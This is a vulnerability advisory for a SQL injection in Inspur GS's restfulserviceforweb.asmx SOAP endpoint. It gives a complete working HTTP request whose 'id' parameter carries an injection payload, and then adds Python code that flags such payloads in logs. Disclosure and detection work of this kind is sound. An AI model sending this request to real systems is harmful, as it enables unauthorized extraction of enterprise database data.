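Vulnerability Description
Inspur GS is system software developed by Inspur. Built on an SOA architecture and the advanced, open GSP application middleware, it is a comprehensive solution for large and medium-sized enterprise groups that centralizes data, applications, and management. The restfulserviceforweb.asmx interface of the Inspur GS system has a SQL injection vulnerability that lets an attacker obtain sensitive data from the database.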
POST /GSPIDM/gsp/webservice/restfulwebservice/restfulserviceforweb.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.1617.9 Safari/537.36
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 1187
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<Get xmlns="http://tempuri.org/">
<Resource>AuthDataModify</Resource>
<Parameter>
<ArrayOfString>
<string>id</string>
<string>admin' AND 7707 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT(CASE WHEN (7707=7707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))--xMuK</string>
</ArrayOfString>
<ArrayOfString>
<string>location</string>
<string>0</string>
</ArrayOfString>
</Parameter>
</Get>
</soap12:Body>
</soap12:Envelope>
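
Added example (not part of the original advisory and not vendor code): a log-review check that parses captured SOAP 1.2 bodies sent to this endpoint and flags `Get` parameters whose values contain SQL syntax. The token list and the helper names (`get_params`, `flag_params`, `sample`) are assumptions, and the sample bodies are constructed.

```python
import re
import xml.etree.ElementTree as ET

SOAP12 = "{http://www.w3.org/2003/05/soap-envelope}"
TEMPURI = "{http://tempuri.org/}"
# Assumed heuristic: tokens a plain identifier value should never contain.
SQLI = re.compile(
    r"'|--|/\*|;|\bchar\s*\(|\bcase\s+when\b|\b(?:select|union|waitfor|exec)\b", re.I)

def get_params(body):
    """Return (resource, {name: value}) from a SOAP 1.2 <Get> call."""
    if "<!DOCTYPE" in body.upper():  # refuse DTDs: entity-expansion risk
        raise ValueError("DTD not allowed")
    root = ET.fromstring(body.encode("utf-8"))
    get = root.find(f"{SOAP12}Body/{TEMPURI}Get")
    if get is None:
        raise ValueError("no Get element")
    resource = get.findtext(f"{TEMPURI}Resource", default="")
    params = {}
    for pair in get.iterfind(f"{TEMPURI}Parameter/{TEMPURI}ArrayOfString"):
        items = [s.text or "" for s in pair.findall(f"{TEMPURI}string")]
        if len(items) == 2:  # each ArrayOfString is a name/value pair
            params[items[0]] = items[1]
    return resource, params

def flag_params(body):
    """Names of parameters matching SQLI; ['<unparseable>'] on bad XML."""
    try:
        _, params = get_params(body)
    except (ET.ParseError, ValueError):
        return ["<unparseable>"]
    return sorted(n for n, v in params.items() if SQLI.search(v))

def sample(id_value):
    """Constructed request body in the shape shown on this page."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap12:Envelope xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">'
        '<soap12:Body><Get xmlns="http://tempuri.org/">'
        '<Resource>AuthDataModify</Resource><Parameter>'
        f'<ArrayOfString><string>id</string><string>{id_value}</string></ArrayOfString>'
        '<ArrayOfString><string>location</string><string>0</string></ArrayOfString>'
        '</Parameter></Get></soap12:Body></soap12:Envelope>'
    )

if __name__ == "__main__":
    for value in ("admin", "admin' AND 1 IN (SELECT CHAR(113))--"):
        print(repr(value), "->", flag_params(sample(value)))
```

A match here is a triage signal for requests to this endpoint; the fix on the server side remains parameterized queries for the `id` value.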